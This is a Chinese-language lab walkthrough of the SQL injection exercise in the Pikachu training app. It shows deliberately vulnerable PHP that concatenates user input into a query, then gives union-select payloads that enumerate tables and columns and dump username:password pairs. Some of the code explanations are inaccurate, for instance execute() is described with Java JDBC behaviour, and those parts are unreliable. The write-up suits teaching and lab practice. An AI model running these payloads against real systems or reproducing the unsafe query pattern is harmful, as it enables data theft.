Sql Inject(SQL注入)概述

        在owasp发布的top10排行榜里，注入漏洞一直是危害排名第一的漏洞，其中注入漏洞里面首当其冲的就是数据库注入漏洞。
一个严重的SQL注入漏洞，可能会直接导致一家公司破产！
SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。 从而导致数据库受损（被脱裤、被删除、甚至整个服务器权限沦陷）。

在构建代码时，一般会从如下几个方面的策略来防止SQL注入漏洞：
1.对传进SQL语句里面的变量进行过滤，不允许危险字符传入；
2.使用参数化（Parameterized Query 或 Parameterized Statement）；
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

源代码：

if(isset($_POST['submit']) && $_POST['id']!=null){//这里没有做任何处理，直接拼到select里面去了,形成Sql注入$id=$_POST['id'];$query="select username,email from member where id=$id";$result=execute($link, $query);//这里如果用==1,会严格一点if(mysqli_num_rows($result)>=1){while($data=mysqli_fetch_assoc($result)){$username=$data['username'];$email=$data['email'];$html.="<p class='notice'>hello,{$username} <br />your email is: {$email}</p>";}}else{$html.="<p class='notice'>您输入的user id不存在，请重新输入！</p>";}
}

我们一行一行来看

if(isset($_POST['submit']) && $_POST['id']!=null)

        判断输入的id是否为空，判断按键是否按下

 $id=$_POST['id'];

定义了一个函数id，并将输入的id的值保存在了里面。

$query="select username,email from member where id=$id";

这是查询函数，也就是一会要执行的命令，即从username、email表中查询id为$id的值。

漏洞就是在这里产生的。

从输入到查询，并没有进行过任何的处理，这就相当于将数据库的查询权限开放给了所有人。

我们一会将说，接着看吧。

$result=execute($link, $query);

execute()：几乎可以执行任何SQL语句，返回值是boolean值，表明该SQL语句是否返回ResultSet对象

boolean值：

true：使用getResultSet()方法获取返回的ResultSet对象
false：使用getUpdateCount()方法获取返回所影响的行数

if(mysqli_num_rows($result)>=1)

mysql_num_rows是PHP语言的中的函数，其表示取得结果集中行的数目。

若是大于等于1，则执行后续代码

 while($data=mysqli_fetch_assoc($result))

mysql_fetch_assoc是一个计算机函数，功能是从结果集中取得一行作为关联数组。返回根据从结果集取得的行生成的关联数组，如果没有更多行，则返回 false。

后面的代码就不细说了。

让我们来看看怎么拿下这个漏洞！

试了一下，网页上只能选择选项。

抓包看看。

ok，试着在id处将查询语句闭合了。

先试试单引号。

$query="select username,email from member where id=$id";

失败了吗？并没有，我们已经成功在后台执行了一次查询，只是报错了，因为数据库里没有标号为1' 的值。

让我们看看能不能输入命令，最简单的就是判断1=1

成功了！

ok，我们开始将深入了！

order by x(数字） 正常与错误的正常值 正确网页正常显示，错误网页报错

现在我们知道了字段长度为二，接下来可以用联合注入查询

利用 union select 联合查询，即可探测到可利用的字段数

id=1 union select 1,2 --+

id=1 union select database(),version() --+

不想看到上面这一条的，可以将id改为-1。

?id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'--+

?id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=1 union select 1,group_concat(username,':',password) from pikachu.users--+

就酱！